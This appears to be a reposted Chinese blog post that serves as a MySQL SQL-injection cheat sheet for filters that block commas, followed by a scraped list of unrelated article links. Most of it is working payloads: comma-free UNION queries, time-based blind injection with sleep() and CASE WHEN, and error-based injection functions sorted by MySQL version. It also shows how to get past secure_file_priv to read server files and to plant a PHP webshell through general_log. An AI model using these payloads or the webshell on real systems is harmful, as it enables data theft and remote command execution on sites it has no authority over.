不存在逗号的情况:

联合查询:

1.UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e)

盲注:

1.select user,password from user where user=‘‘ and (sleep(length(user())=14));

select user,password from user where user=‘‘ and  (sleep(ascii(mid(user()from(1)for(1)))=114));

这是第一种,直接执行sleep()函数,但是没办法控制延迟时间,固定为sleep(true) == sleep(1),当网络存在波动的时候,可能会误判。

2.select user,password from user where user=‘‘ and (select case when (length(user())=14) then sleep(5) else 0 end);

select user,password from user where user=‘‘ and (select case when (substring((select user()) from(1)for(1))=‘o‘) then sleep(5) else 0 end);

这是第二种,case when关键字,代替 if 语句。

substring((select user()),1,2) == substring((select user()) from(1)for(2)) :from(1)表示从第一个位置开始,for(2)表示截取两个字符。P.S: mid函数同理。

substring((select user()) from-10) :也可以这样写,表示截取最后10位字符。这可以配合regexp使用正则来使用:substring(user() from-10) regexp ‘.*host‘

报错注入:

测试的数据库版本为:5.0.96-community,5.1.60-community,5.5.29,5.5.53,5.7.26

5.0.96-community下:

@@secure_file_priv 为 NULL,默认不影响读,写文件等操作。

只有 floor( 函数的报错语句可以使用,但是该语句必须要 逗号 。

5.1.60-community下:

@@secure_file_priv 为 NULL,默认不影响 读,写文件等操作。

1.extractValue,updateXML 这两个函数可以开始使用了,具体Mysql版本:>=5.1.5即可使用,但是也必须使用逗号。

注:该函数每次查询的数据只有32个字符,可以配合substr函数使用。

2.floor导致的报错可以使用。

3.geometrycollection()、multiponint()、polygon()、multipolygon()、linestring()、multilinestring()等函数都可以使用,并且不需要逗号。

4.exp函数导致的报错,不能使用。

5.5.29:

@@secure_file_priv 为 NULL,默认不影响 读,写文件等操作。

1.extractValue,updateXML,floor,都可以使用,但是需要逗号。

2..geometrycollection()、multiponint()、polygon()、multipolygon()、linestring()、multilinestring(),exp() 都可以使用,不需要逗号。

5.5.53

@@secure_file_priv 为 NULL,默认 影响 读,写文件等操作。

绕过secure_file_priv 限制进行读写文件:

读文件:

CREATE TABLE `tmp` (`tmp` TEXT NOT NULL );

load data local infile ‘D:/5529.txt‘ into table tmp;   成功将文件内容写入tmp表。

写文件:

set global general_log=‘on‘;

SET global general_log_file=‘D:/cmd.php‘;

SELECT ‘<?php assert($_POST["cmd"]);?>‘;

需要能执行多语句。

1.geometrycollection()、multiponint()、polygon()、multipolygon()、linestring()、multilinestring(),exp()等关键字的报错语句全部失败。

2.extractValue,updateXML,floor,都可以使用,但是需要逗号。

5.7.26

@@secure_file_priv 为 NULL,默认 影响 读,写文件等操作。

绕过secure_file_priv 限制进行读写文件,利用如上5.5.53。

1.geometrycollection()、multiponint()、polygon()、multipolygon()、linestring()、multilinestring(),exp()等关键字的报错语句全部失败。

2.extractValue,updateXML,都可以使用,但是需要逗号。

3.新增的报错语句:select ST_LatFromGeoHash(user());select ST_LongFromGeoHash(user());select ST_PointFromGeoHash(user(),1);select GTID_SUBSET(user(),1);

4.floor的报错语句,在5.7版本中与之前的有一些不一样。也就是使用 and 还是 or 连接符的结果不一样。也就是:

(select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) 必须要能执行。见图:

文章持续更新...

原文:https://www.cnblogs.com/xiaozhiru/p/12638280.html

MySQL不使用逗号_Mysql 不能使用逗号的情况相关推荐

  1. mysql 不能有连续的逗号_Mysql 不能使用逗号的情况

    不存在逗号的情况: 联合查询: 1.UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4) ...

  2. mysql存储csv文件_MySQL 查询结果保存为CSV文件

    MySQL支持将查询结果直接导出为文本格式,格式如下: into outfile '导出的目录和文件名'                  指定导出的目录和文件名 fields terminated ...

  3. mysql查询排除字段_mysql查询表,指定排除字段

    查询user表中除email以外的所有字段 假设数据库bbs中有user表,字段如下 id,username,password,gender,email ----------------------- ...

  4. centos得mysql安装教程_Centos下Mysql安装图文教程_MySQL

    Mysql是比较常用的数据库,日常开发中也是采用地比较多.工欲善其事必先利其器,本文特地来讲解下如何在centos(其他linux发行版类似)下安装Mysql.首先准备的材料:Mysql,我这里采用的 ...

  5. scanf 输入加逗号(或者不加逗号)出现的异常及解决方案

    我们在写 C 语言代码通常 scanf 的格式控制部分都有两种习惯,加逗号与不加逗号,而这两种情况都会因为我们的不同输入习惯产生一定的问题,这里给出另一种方法. 1.不加逗号 1 #include&l ...

  6. java中文逗号替换成英文逗号_word如何将大量英文逗号批量替换为中文逗号?

    录入长篇文档往往需要频繁切换输入法,在录入中文文章的时候,有时会不小心录入如图 7‑6所示的大量英文逗号,此时该如何将其批量替换为中文逗号呢? 图7‑6英文逗号(英文逗号用粉红色标注) 解决方案1 将 ...

  7. 正则匹配字符串最后一个逗号,不是逗号不匹配

    正则匹配字符串最后一个逗号,不是逗号不匹配: ,$ 匹配最后一个逗号 最后一个不是逗号不匹配 需要匹配其他字符可以把逗号替换掉 匹配最后一个数字,不是数字不匹配 \d$ 匹配最后一位包括下划线的任何单 ...

  8. c语言将英文逗号转成中文逗号,处理csv文件,英文逗号替换成中文逗号之后就乱码...

    Python2.7,处理csv文件时,把英文逗号替换成中文逗号之后就会乱码,title变量会乱码,可是content就不会,他们都是str类型,麻烦大家,这是为啥??def main(): #初始化数 ...

  9. mysql怎么跑代码_MySQL菜鸟入门指南_mysql

    mysql是完全网络化的跨平台关系型数据库系统,一个真正的多用户.多线程SQL数据库服务器,同时是具有客户机/服务器体系结构的分布式数据库管理系统.它具有功能强.使用简便.管理方便.容易使用.运行速度 ...

最新文章

  1. PLOS Biology: 发现一种固氮玉米
  2. php开发 linux作用是什么,linux有什么用?
  3. 【408预推免复习】操作系统之存储器管理
  4. Java一行一行的读文件和简单的写文件
  5. python turtle画海绵宝宝_24.1. turtle — 海龟绘图 — Python 3.6.12 文档
  6. php代码function,ThinkPHP ~function()和function()方法和U方法
  7. 重构:改善既有代码的设计(评注版) 评注者序
  8. linux mysql 主从数据库_【Linux】【MySQL】MySQL主从数据库
  9. 单因子测试用什么软件检查,如何进行单元测试?
  10. 【Landsat 8】介绍
  11. python调用通达信公式_python读取通达信公式结果
  12. 经典商业模式案例第1例:校园O2O
  13. 联通ip电视html1连不上,刷华硕固件看联通IPTV和上网两不误
  14. 大学往事 第五章 计算机班的女生
  15. @Resource报错
  16. 工具优化篇之IDEA新UI+日常插件
  17. enumerate和iter的使用
  18. SpringBoot中的html页面访问不到js,css等静态资源问题解决方案
  19. 使用sql语句往MySQL插入1000万条数据
  20. 贴一点代码(用VC实现在WINXP下的宽带拨号)

热门文章

  1. 深度学习为图片压缩算法赋能:节省55%带宽
  2. 设计模式C++实现(7)——观察者模式
  3. Spring/SpingMVC常见问题总结
  4. 数据结构与算法之完全二叉树的节点个数
  5. Java基础之代码执行顺序深入解析
  6. FFmpeg源代码:avcodec_receive_frame
  7. Cannot resolve xxx.5.5
  8. Node.js CLI 工具最佳实践
  9. 如何提升springboot服务吞吐量
  10. 带你理清 Java 混乱的日志体系 - log4j、logback、log4j2、jcl、SLFJ 究竟是啥关系?